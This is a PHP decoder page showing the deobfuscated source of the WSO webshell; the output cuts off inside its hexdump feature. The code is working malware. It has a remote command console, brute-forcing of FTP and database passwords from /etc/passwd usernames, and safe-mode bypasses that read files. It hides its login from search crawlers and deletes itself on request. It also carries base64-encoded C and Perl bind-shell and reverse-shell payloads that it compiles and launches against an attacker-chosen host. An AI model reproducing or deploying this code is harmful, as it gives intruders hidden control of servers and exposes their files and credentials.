Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

goto r3B2Y; Oda8Q: function actionConsole() { if (!empty($_POST["\x70\61"]) && !empty($_P..

Decoded Output download

<?   goto r3B2Y; Oda8Q: function actionConsole() { if (!empty($_POST["p1"]) && !empty($_POST["p2"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "stderr_to_out", true); $_POST["p1"] .= " 2>&1"; } elseif (!empty($_POST["p1"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "stderr_to_out", 0); } if (isset($_POST["ajax"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "ajax", true); ob_start(); echo "d.cf.cmd.value='';
"; $temp = @iconv($_POST["charset"], "UTF-8", addcslashes("
$ " . $_POST["p1"] . "
" . ex($_POST["p1"]), "
\xd\x9\'\0")); if (preg_match("!.*cd\s+([^;]+)$!", $_POST["p1"], $match)) { if (@chdir($match[1])) { $GLOBALS["cwd"] = @getcwd(); echo "c_='" . $GLOBALS["cwd"] . "';"; } } echo "d.cf.output.value+='" . $temp . "';"; echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), "
", $temp; die; } if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } hardHeader(); echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);\xavar cmds = new Array('');
var cur = 0;
function kp(e) {
\x9var n = (window.Event) ? e.which : e.keyCode;
\x9if(n == 38) {
	\x9cur--;\xa	\x9if(cur>=0)
\x9\x9	document.cf.cmd.value = cmds[cur];\xa	\x9else\xa\x9\x9\x9cur++;\xa	} else if(n == 40) {\xa	\x9cur++;\xa\x9	if(cur < cmds.length)\xa\x9		document.cf.cmd.value = cmds[cur];
\x9\x9else
	\x9\x9cur--;
\x9}
}
function add(cmd) {\xa\x9cmds.pop();\xa	cmds.push(cmd);
\x9cmds.push('');\xa\x9cur = cmds.length-1;\xa}
</script>"; echo "<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value=='clear'){d.cf.output.value='';d.cf.cmd.value='';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:'');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:'');} return false;"><label><select name=alias>"; foreach ($GLOBALS["aliases"] as $n => $v) { if ($v == '') { echo "<optgroup label="-" . htmlspecialchars($n) . "-"></optgroup>"; continue; } echo "<option value="" . htmlspecialchars($v) . "">" . $n . "</option>"; } echo "</select></label><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}" value="submit"> <nobr><input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX <input type=checkbox name=show_errors value=1 " . (!empty($_POST["p2"]) || $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "stderr_to_out"] ? "checked" : '') . "> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin-top:5px;" readonly>"; if (!empty($_POST["p1"])) { echo htmlspecialchars("$ " . $_POST["p1"] . "\xa" . ex($_POST["p1"])); } echo "</textarea><table style="border:1px solid #060a10;background-color:#060a10;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>"; echo "</form></div><script>d.cf.cmd.focus();</script>"; hardFooter(); } goto xWgYK; asFIH: function actionSelfRemove() { if ($_POST["p1"] == "yes") { if (@unlink(preg_replace("!\(\d+\)\s.*!", '', __FILE__))) { die("Shell has been removed"); } else { echo "unlink error!"; } } if ($_POST["p1"] != "yes") { hardHeader(); } echo "<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,'yes')">Yes</a></div>"; hardFooter(); } goto eHsyk; gS860: function perms($p) { if (($p & 49152) == 49152) { $i = "s"; } elseif (($p & 40960) == 40960) { $i = "l"; } elseif (($p & 32768) == 32768) { $i = "-"; } elseif (($p & 24576) == 24576) { $i = "b"; } elseif (($p & 16384) == 16384) { $i = "d"; } elseif (($p & 8192) == 8192) { $i = "c"; } elseif (($p & 4096) == 4096) { $i = "p"; } else { $i = "u"; } $i .= $p & 256 ? "r" : "-"; $i .= $p & 128 ? "w" : "-"; $i .= $p & 64 ? $p & 2048 ? "s" : "x" : ($p & 2048 ? "S" : "-"); $i .= $p & 32 ? "r" : "-"; $i .= $p & 16 ? "w" : "-"; $i .= $p & 8 ? $p & 1024 ? "s" : "x" : ($p & 1024 ? "S" : "-"); $i .= $p & 4 ? "r" : "-"; $i .= $p & 2 ? "w" : "-"; $i .= $p & 1 ? $p & 512 ? "t" : "x" : ($p & 512 ? "T" : "-"); return $i; } goto y4kgJ; f9sl9: function actionBruteforce() { hardHeader(); if (isset($_POST["proto"])) { echo "<h1>Results</h1><div class=content><span>Type:</span> " . htmlspecialchars($_POST["proto"]) . " <span>Server:</span> " . htmlspecialchars($_POST["server"]) . "<br>"; if ($_POST["proto"] == "ftp") { function bruteForce($ip, $port, $login, $pass) { $fp = @ftp_connect($ip, $port ? $port : 21); if (!$fp) { return false; } $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif ($_POST["proto"] == "mysql") { function bruteForce($ip, $port, $login, $pass) { $res = @mysql_connect($ip . ":" . ($port ? $port : 3306), $login, $pass); @mysql_close($res); return $res; } } elseif ($_POST["proto"] == "pgsql") { function bruteForce($ip, $port, $login, $pass) { $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST["server"]); if ($_POST["type"] == 1) { $temp = @file("/etc/passwd"); if (is_array($temp)) { foreach ($temp as $line) { $line = explode(":", $line); ++$attempts; if (bruteForce(@$server[0], @$server[1], $line[0], $line[0])) { $success++; echo "<b>" . htmlspecialchars($line[0]) . "</b>:" . htmlspecialchars($line[0]) . "<br>"; } if (@$_POST["reverse"]) { $tmp = ''; for ($i = strlen($line[0]) - 1; $i >= 0; --$i) { $tmp .= $line[0][$i]; } ++$attempts; if (bruteForce(@$server[0], @$server[1], $line[0], $tmp)) { $success++; echo "<b>" . htmlspecialchars($line[0]) . "</b>:" . htmlspecialchars($tmp); } } } } } elseif ($_POST["type"] == 2) { $temp = @file($_POST["dict"]); if (is_array($temp)) { foreach ($temp as $line) { $line = trim($line); ++$attempts; if (bruteForce($server[0], @$server[1], $_POST["login"], $line)) { $success++; echo "<b>" . htmlspecialchars($_POST["login"]) . "</b>:" . htmlspecialchars($line) . "<br>"; } } } } echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>"; } echo "<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>" . "<td><label><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></label></td></tr><tr><td>" . "<input type=hidden name=c value="" . htmlspecialchars($GLOBALS["cwd"]) . "">" . "<input type=hidden name=a value="" . htmlspecialchars($_POST["a"]) . "">" . "<input type=hidden name=charset value="" . htmlspecialchars($_POST["charset"]) . "">" . "<input type=hidden name=ne  value="">" . "<span>Server:port</span></td>" . "<td><input type=text name=server value="127.0.0.1"></td></tr>" . "<tr><td><span>Brute type</span></td>" . "<td><input type=radio name=type value="1" checked> /etc/passwd</td></tr>" . "<tr><td></td><td style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</td></tr>" . "<tr><td></td><td><input type=radio name=type value="2"> Dictionary</td></tr>" . "<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>" . "<td><input type=text name=login value="root"></td></tr>" . "<tr><td><span>Dictionary</span></td>" . "<td><input type=text name=dict value="" . htmlspecialchars($GLOBALS["cwd"]) . "passwd.dic"></td></tr></table>" . "</td></tr><tr><td></td><td><input type=submit value="submit"></td></tr></form></table>"; echo "</div>"; hardFooter(); } goto rGxXC; Xbodc: if (!function_exists("get_magic_quotes_gpc") || get_magic_quotes_gpc()) { function stripslashes_array($array) { return is_array($array) ? array_map("stripslashes_array", $array) : stripslashes($array); } $_POST = stripslashes_array($_POST); $_COOKIE = stripslashes_array($_COOKIE); } goto p17RR; gaKKg: function actionSafeMode() { $temp = ''; ob_start(); switch ($_POST["p1"]) { case 1: $temp = @tempnam($test, "cx"); if (@copy("compress.zlib://" . $_POST["p2"], $temp)) { echo @file_get_contents($temp); unlink($temp); } else { echo "Sorry... Can't open file"; } break; case 2: $files = glob($_POST["p2"] . "*"); if (is_array($files)) { foreach ($files as $filename) { echo $filename . "\xa"; } } break; case 3: $ch = curl_init("file://" . $_POST["p2"] . "\0" . SELF_PATH); curl_exec($ch); break; case 4: ini_restore("safe_mode"); ini_restore("open_basedir"); include $_POST["p2"]; break; case 5: for (; $_POST["p2"] <= $_POST["p3"]; $_POST["p2"]++) { $uid = @posix_getpwuid($_POST["p2"]); if ($uid) { echo join(":", $uid) . "\xa"; } } break; case 6: if (!function_exists("imap_open")) { break; } $stream = imap_open($_POST["p2"], '', ''); if ($stream == FALSE) { break; } echo imap_body($stream, 1); imap_close($stream); break; } $temp = ob_get_clean(); hardHeader(); echo "<h1>Safe mode bypass</h1><div class=content>"; echo "<span>Copy (read file)</span><form onsubmit='g(null,null,"1",this.param.value);return false;'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Glob (list dir)</span><form onsubmit='g(null,null,"2",this.param.value);return false;'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Curl (read file)</span><form onsubmit='g(null,null,"3",this.param.value);return false;'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Ini_restore (read file)</span><form onsubmit='g(null,null,"4",this.param.value);return false;'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value="submit"></form><br><br><span>Imap_open (read file)</span><form onsubmit='g(null,null,"6",this.param.value);return false;'><input type=text name=param><input type=submit value="submit"></form>"; if ($temp) { echo "<pre class="ml1" style="margin-top:5px" id="Output">" . $temp . "</pre>"; } echo "</div>"; hardFooter(); } goto urnx6; ZjyZB: if (!empty($_POST["a"]) && function_exists("action" . $_POST["a"])) { call_user_func("action" . $_POST["a"]); } goto G6Uv3; R8xcz: function decrypt($str, $pwd) { $pwd = base64_encode($pwd); $str = base64_decode($str); $enc_chr = ''; $enc_str = ''; $i = 0; while ($i < strlen($str)) { for ($j = 0; $j < strlen($pwd); $j++) { $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j])); $enc_str .= $enc_chr; $i++; if ($i >= strlen($str)) { break; } } } return base64_decode($enc_str); } goto w0nra; wlqmv: $cwd = @getcwd(); goto vmP50; nbi9R: function viewSize($s) { if ($s >= 1073741824) { return sprintf("%1.2f", $s / 1073741824) . " GB"; } elseif ($s >= 1048576) { return sprintf("%1.2f", $s / 1048576) . " MB"; } elseif ($s >= 1024) { return sprintf("%1.2f", $s / 1024) . " KB"; } else { return $s . " B"; } } goto gS860; KGlJ0: if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $os = "win"; } else { $os = "nix"; } goto JCS_A; qDiW5: $ = "FilesMan"; goto WeQHr; xxz2n: if (!$safe_mode) { error_reporting(0); } goto E3hGz; w0nra: @ini_set("error_log", NULL); goto hwJg4; BKw4L: if (version_compare(PHP_VERSION, "5.3.0", "<")) { set_magic_quotes_runtime(0); } goto IjCwH; E3hGz: $disable_functions = @ini_get("disable_functions"); goto WJp40; w9TDR: function prototype($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } goto uwRUw; B0PbS: if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"])) { $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] = (bool) $; } goto PtFVC; UOKiC: if (empty($_POST["charset"])) { $_POST["charset"] = $; } goto FVur6; et3or: function actionNetwork() { hardHeader(); $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; echo "<h1>Network tools</h1><div class=content>
	<form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'>
	<span>Bind port to /bin/sh</span><br/>\xa	Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass'> Using: <label><select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select></label> <input type=submit value='submit'>
	</form>
\x9<form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'>\xa\x9<span>Back-connect to</span><br/>\xa\x9Server: <input type='text' name='server' value=" . $_SERVER["REMOTE_ADDR"] . "> Port: <input type='text' name='port' value='31337'> Using: <label><select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select></label> <input type=submit value='submit'>
	</form><br>"; if (isset($_POST["p1"])) { function cf($f, $t) { $w = @fopen($f, "w") or @function_exists("file_put_contents"); if ($w) { @fwrite($w, base64_decode($t)) or @fputs($w, base64_decode($t)) or @file_put_contents($f, base64_decode($t)); @fclose($w); } } if ($_POST["p1"] == "bpc") { cf("/tmp/bp.c", $bind_port_c); $ = ex("gcc -o /tmp/bp /tmp/bp.c"); @unlink("/tmp/bp.c"); $ .= ex("/tmp/bp " . $_POST["p2"] . " " . $_POST["p3"] . " &"); echo "<pre class=ml1>{$}" . ex("ps aux | grep bp") . "</pre>"; } if ($_POST["p1"] == "bpp") { cf("/tmp/bp.pl", $bind_port_p); $ = ex(which("perl") . " /tmp/bp.pl " . $_POST["p2"] . " &"); echo "<pre class=ml1>{$}" . ex("ps aux | grep bp.pl") . "</pre>"; } if ($_POST["p1"] == "bcc") { cf("/tmp/bc.c", $back_connect_c); $ = ex("gcc -o /tmp/bc /tmp/bc.c"); @unlink("/tmp/bc.c"); $ .= ex("/tmp/bc " . $_POST["p2"] . " " . $_POST["p3"] . " &"); echo "<pre class=ml1>{$}" . ex("ps aux | grep bc") . "</pre>"; } if ($_POST["p1"] == "bcp") { cf("/tmp/bc.pl", $back_connect_p); $ = ex(which("perl") . " /tmp/bc.pl " . $_POST["p2"] . " " . $_POST["p3"] . " &"); echo "<pre class=ml1>{$}" . ex("ps aux | grep bc.pl") . "</pre>"; } } echo "</div>"; hardFooter(); } goto M5O7z; YnRbs: function hardScandir($dir) { if (function_exists("scandir")) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) { $files[] = $filename; } return $files; } } goto VnLxZ; VMrgb: function ex($in) { $ = ''; if (function_exists("exec")) { @exec($in, $); $ = @join("\xa", $); } elseif (function_exists("passthru")) { ob_start(); @passthru($in); $ = ob_get_clean(); } elseif (function_exists("system")) { ob_start(); @system($in); $ = ob_get_clean(); } elseif (function_exists("shell_exec")) { $ = shell_exec($in); } elseif (is_resource($f = @popen($in, "r"))) { $ = ''; while (!@feof($f)) { $ .= fread($f, 1024); } pclose($f); } else { return "\xe2\x86\263 Unable to execute command
"; } return $ == '' ? "\xe2\x86\263 Query did not return anything\xa" : $; } goto nbi9R; VnLxZ: function which($p) { $path = ex("which " . $p); if (!empty($path)) { return $path; } return false; } goto Th0Rk; PtFVC: function hardLogin() { if (!empty($_SERVER["HTTP_USER_AGENT"])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if (preg_match("/" . implode("|", $userAgents) . "/i", $_SERVER["HTTP_USER_AGENT"])) { header("HTTP/1.0 404 Not Found"); die; } } die("</br></br><pre align=center><form method=post style='font-family:Nunito, sans-serif;color:#1a1a1a; text-shadow: 2px 0 0 #0d52bf, -2px 0 0 #0d52bf, 0 2px 0 #0d52bf, 0 -2px 0 #0d52bf, 1px 1px #0d52bf, -1px -1px 0 #0d52bf, 1px -1px 0 #0d52bf, -1px 1px 0 #0d52bf; text-align: center;'><h3>Hello <br>Welcome to wso webshell redesignated by mIcHy AmRaNe</h3><br><input placeholder='password' type=password name=pass style='border-radius: 4px 0px 0px 4px; background-color:whitesmoke;border:1px solid #FFF;outline:none;' required><input type=submit name='watching' value='>>' style='height: 20px; border: none; border-radius: 0px 4px 4px 0px;background-color:#0d52bf;color:#fff;cursor:pointer;'></form></pre>
<div class='view'><div class='plane main'><div class='circle'></div><div class='circle'></div><div class='circle'></div><div class='circle'></div><div class='circle'></div><div class='circle'></div></div></div>\xa<style>body,html{background:#1a1a1a;overflow:hidden;width:100%;height:100%;position:absolute;z-index: -2;}.view{position:absolute;top:0;left:0;right:0;bottom:0;-webkit-perspective:400;perspective:400;z-index: -2;}.plane{width:120px;height:120px;-webkit-transform-style:preserve-3d;transform-style:preserve-3d;position:absolute;z-index: -2;}.plane.main{position:absolute;top:0;left:0;right:0;bottom:0;margin:auto;-webkit-transform:rotateX(60deg) rotateZ(-30deg);transform:rotateX(60deg) rotateZ(-30deg);-webkit-animation:rotate 20s infinite linear;animation:rotate 20s infinite linear;z-index: -2;}.plane.main .circle{width:120px;height:120px;position:absolute;-webkit-transform-style:preserve-3d;transform-style:preserve-3d;border-radius:100%;box-sizing:border-box;box-shadow:0 0 60px #a10705,inset 0 0 60px #7a0000;z-index: -2;}.plane.main .circle::after,.plane.main .circle::before{content:'';display:block;position:absolute;top:0;left:0;right:0;bottom:0;margin:auto;width:5%;height:5%;border-radius:100%;background:#5d0819;box-sizing:border-box;box-shadow:0 0 60px 2px #7a0000;z-index: -2;}.plane.main .circle::before{-webkit-transform:translateZ(-90px);transform:translateZ(-90px)}.plane.main .circle::after{-webkit-transform:translateZ(90px);transform:translateZ(90px)}.plane.main .circle:nth-child(1){-webkit-transform:rotateZ(72deg) rotateX(63.435deg);transform:rotateZ(72deg) rotateX(63.435deg)}.plane.main .circle:nth-child(2){-webkit-transform:rotateZ(144deg) rotateX(63.435deg);transform:rotateZ(144deg) rotateX(63.435deg)}.plane.main .circle:nth-child(3){-webkit-transform:rotateZ(216deg) rotateX(63.435deg);transform:rotateZ(216deg) rotateX(63.435deg)}.plane.main .circle:nth-child(4){-webkit-transform:rotateZ(288deg) rotateX(63.435deg);transform:rotateZ(288deg) rotateX(63.435deg)}.plane.main .circle:nth-child(5){-webkit-transform:rotateZ(360deg) rotateX(63.435deg);transform:rotateZ(360deg) rotateX(63.435deg)}@-webkit-keyframes rotate{0%{-webkit-transform:rotateX(0) rotateY(0) rotateZ(0);transform:rotateX(0) rotateY(0) rotateZ(0)}100%{-webkit-transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg);transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg)}}@keyframes rotate{0%{-webkit-transform:rotateX(0) rotateY(0) rotateZ(0);transform:rotateX(0) rotateY(0) rotateZ(0)}100%{-webkit-transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg);transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg)}}; h2{color:whitesmoke; font-weight:bold; text-decoration:underline;}</style>"); } goto KGlJ0; h3psb: function actionFilesTools() { if (isset($_POST["p1"])) { $_POST["p1"] = urldecode($_POST["p1"]); } if (@$_POST["p2"] == "download") { if (@is_file($_POST["p1"]) && @is_readable($_POST["p1"])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=" . basename($_POST["p1"])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST["p1"]); header("Content-Type: " . $type); } else { header("Content-Type: application/octet-stream"); } $fp = @fopen($_POST["p1"], "r"); if ($fp) { while (!@feof($fp)) { echo @fread($fp, 1024); } fclose($fp); } } die; } if (@$_POST["p2"] == "mkfile") { if (!file_exists($_POST["p1"])) { $fp = @fopen($_POST["p1"], "w"); if ($fp) { $_POST["p2"] = "edit"; fclose($fp); } } } hardHeader(); echo "<h1>File tools</h1><div class=content>"; if (!file_exists(@$_POST["p1"])) { echo "File not exists"; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST["p1"])); if (!$uid) { $uid["name"] = @fileowner($_POST["p1"]); $gid["name"] = @filegroup($_POST["p1"]); } else { $gid = @posix_getgrgid(@filegroup($_POST["p1"])); } echo "<span>Name:</span> " . htmlspecialchars(@basename($_POST["p1"])) . " <span>Size:</span> " . (is_file($_POST["p1"]) ? viewSize(filesize($_POST["p1"])) : "-") . " <span>Permission:</span> " . viewPermsColor($_POST["p1"]) . " <span>Owner/Group:</span> " . $uid["name"] . "/" . $gid["name"] . "<br>"; echo "<span>Create time:</span> " . date("Y-m-d H:i:s", filectime($_POST["p1"])) . " <span>Access time:</span> " . date("Y-m-d H:i:s", fileatime($_POST["p1"])) . " <span>Modify time:</span> " . date("Y-m-d H:i:s", filemtime($_POST["p1"])) . "<br><br>"; if (empty($_POST["p2"])) { $_POST["p2"] = "view"; } if (is_file($_POST["p1"])) { $m = array("View", "Highlight", "Download", "Hexdump", "Edit", "Chmod", "Rename", "Touch", "Frame"); } else { $m = array("Chmod", "Rename", "Touch"); } foreach ($m as $v) { echo "<a href=# onclick="g(null,null,'" . urlencode($_POST["p1"]) . "','" . strtolower($v) . "')">" . (strtolower($v) == @$_POST["p2"] ? "<b>[ " . $v . " ]</b>" : $v) . "</a> "; } echo "<br><br>"; switch ($_POST["p2"]) { case "view": echo "<pre class=ml1>"; $fp = @fopen($_POST["p1"], "r"); if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } echo "</pre>"; break; case "highlight": if (@is_readable($_POST["p1"])) { echo "<div class=ml1 style="background-color: #e1e1e1;color:black;">"; $oRb = @highlight_file($_POST["p1"], true); echo str_replace(array("<span ", "</span>"), array("<font ", "</font>"), $oRb) . "</div>"; } break; case "chmod": if (!empty($_POST["p3"])) { $perms = 0; for ($i = strlen($_POST["p3"]) - 1; $i >= 0; --$i) { $perms += (int) $_POST["p3"][$i] * pow(8, strlen($_POST["p3"]) - $i - 1); } if (!@chmod($_POST["p1"], $perms)) { echo "Can't set permissions!<br><script>document.mf.p3.value="";</script>"; } } clearstatcache(); echo "<script>p3_="";</script><form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.chmod.value);return false;"><input type=text name=chmod value="" . substr(sprintf("%o", fileperms($_POST["p1"])), -4) . ""><input type=submit value="submit"></form>"; break; case "edit": if (!is_writable($_POST["p1"])) { echo "File isn't writeable"; break; } if (!empty($_POST["p3"])) { $time = @filemtime($_POST["p1"]); $_POST["p3"] = substr($_POST["p3"], 1); $fp = @fopen($_POST["p1"], "w"); if ($fp) { @fwrite($fp, $_POST["p3"]); @fclose($fp); echo "Saved!<br><script>p3_="";</script>"; @touch($_POST["p1"], $time, $time); } } echo "<form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,'1'+this.text.value);return false;"><textarea name=text class=bigarea>"; $fp = @fopen($_POST["p1"], "r"); if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } echo "</textarea><input type=submit value="submit"></form>"; break; case "hexdump": $c = @file_get_contents($_POST["p1"]); $n = 0; $h = array("00000000<br>", '', ''); $len = strlen($c); for ($i = 0; $i < $len; ++$i) { $h[1] .= sprintf("%02X", ord($c[$i])) . " "; switch (ord($c[$i])) { case 0: $h[2] .= " "; break; case 9: $h[2] .= " "; break; case 10: $h[2] .= " 